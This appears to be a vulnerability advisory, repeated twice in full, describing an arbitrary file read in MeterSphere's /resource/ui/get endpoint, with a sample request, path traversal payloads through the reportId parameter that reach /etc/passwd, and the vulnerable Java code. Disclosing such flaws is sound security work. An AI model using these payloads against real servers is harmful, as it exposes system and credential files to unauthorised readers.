Summary
The system has an arbitrary file reading vulnerability, which can read the /etc/passwd file of the system.
This vulnerability affects versions v1.20.19-lts (latest) and below (v1.20.18-lts-b1 is also affected). Installation method reference: https://metersphere.io/docs/v2.x/installation/online_installation/
Details
You need to create a resource file through UI operations. For convenience, you can also create a test file directly from the image.
The file directory is as follows:
where 1 is the reportId parameter in the corresponding interface of the directory, 1 txt is the fileName parameter in the fileName interface corresponding to the file name. 2. txt is the first file read.
The interfaces are:
GET /resource/ui/get?fileName=2&reportId=2 HTTP/1.1
Cookie: SESSION=ZjllMjRjMWEtMmRhNC00MGU0LTlkMjMtOGY1MDllOWI1ZWE3 X-Schema: http
Accept: /
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0
Connection: keep-alive
Referencing: http://192.168.11.77:8081/swagger-ui/index.html?configUrl=/v3/api-docs/swagger-config
Host: 192.168.11.77:8081
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
CSRF-TOKEN: rcK0OGd0O5Df14tmgilfoCSsiJaS9OiQugGZWf19A/yCU2SXvLnPTPZNwiG9AUj0RWtFWbWCencuKk/L+90++A==
PoC
2.2 Read 2 txt
Payload :
/resource/ui/get?fileName=2.txt&reportId=1/..
Effect:
2.3 Read the passwd file
Payload:
/resource/ui/get?fileName=passwd&reportId=1/.. /.. /.. /.. /.. /.. /.. /.. /etc/
Effect:
Impact
Source code analysis
The read interface ResourceController .java at (framework/sdk-parent/sdk/src/main/java/io/metersphere/controller/ResourceController.java).
The code is:
@GetMapping(value = "/ui/get")
public ResponseEntity getUiFile(@RequestParam ("fileName") String fileName, @RequestParam ("reportId") String reportId) {
return resourceService.getUiResultImage(fileName, reportId);
}
The trace resourceService's method of reading a file getUiResultImage(fileName, reportId) is as follows:
public ResponseEntity getUiResultImage(String name, String reportId) {
if (name.contains("/")) {
MSException.throwException(Translator.get("invalid_parameter"));
}
return getImage(FileUtils.UI_IMAGE_DIR + "/" + reportId + "/" + name);
}
Obviously, name has filtering, while reportId does not. In this way, name does not need to enter /, and can be read with reportId.
Summary
The system has an arbitrary file reading vulnerability, which can read the /etc/passwd file of the system.
This vulnerability affects versions v1.20.19-lts (latest) and below (v1.20.18-lts-b1 is also affected). Installation method reference: https://metersphere.io/docs/v2.x/installation/online_installation/
Details
You need to create a resource file through UI operations. For convenience, you can also create a test file directly from the image.
The file directory is as follows:
where 1 is the reportId parameter in the corresponding interface of the directory, 1 txt is the fileName parameter in the fileName interface corresponding to the file name. 2. txt is the first file read.
The interfaces are:
GET /resource/ui/get?fileName=2&reportId=2 HTTP/1.1
Cookie: SESSION=ZjllMjRjMWEtMmRhNC00MGU0LTlkMjMtOGY1MDllOWI1ZWE3 X-Schema: http
Accept: /
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0
Connection: keep-alive
Referencing: http://192.168.11.77:8081/swagger-ui/index.html?configUrl=/v3/api-docs/swagger-config
Host: 192.168.11.77:8081
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
CSRF-TOKEN: rcK0OGd0O5Df14tmgilfoCSsiJaS9OiQugGZWf19A/yCU2SXvLnPTPZNwiG9AUj0RWtFWbWCencuKk/L+90++A==
PoC
2.2 Read 2 txt
Payload :
/resource/ui/get?fileName=2.txt&reportId=1/..
Effect:
2.3 Read the passwd file
Payload:
/resource/ui/get?fileName=passwd&reportId=1/.. /.. /.. /.. /.. /.. /.. /.. /etc/
Effect:
Impact
Source code analysis
The read interface ResourceController .java at (framework/sdk-parent/sdk/src/main/java/io/metersphere/controller/ResourceController.java).
The code is:
@GetMapping(value = "/ui/get")
public ResponseEntity getUiFile(@RequestParam ("fileName") String fileName, @RequestParam ("reportId") String reportId) {
return resourceService.getUiResultImage(fileName, reportId);
}
The trace resourceService's method of reading a file getUiResultImage(fileName, reportId) is as follows:
public ResponseEntity getUiResultImage(String name, String reportId) {
if (name.contains("/")) {
MSException.throwException(Translator.get("invalid_parameter"));
}
return getImage(FileUtils.UI_IMAGE_DIR + "/" + reportId + "/" + name);
}
Obviously, name has filtering, while reportId does not. In this way, name does not need to enter /, and can be read with reportId.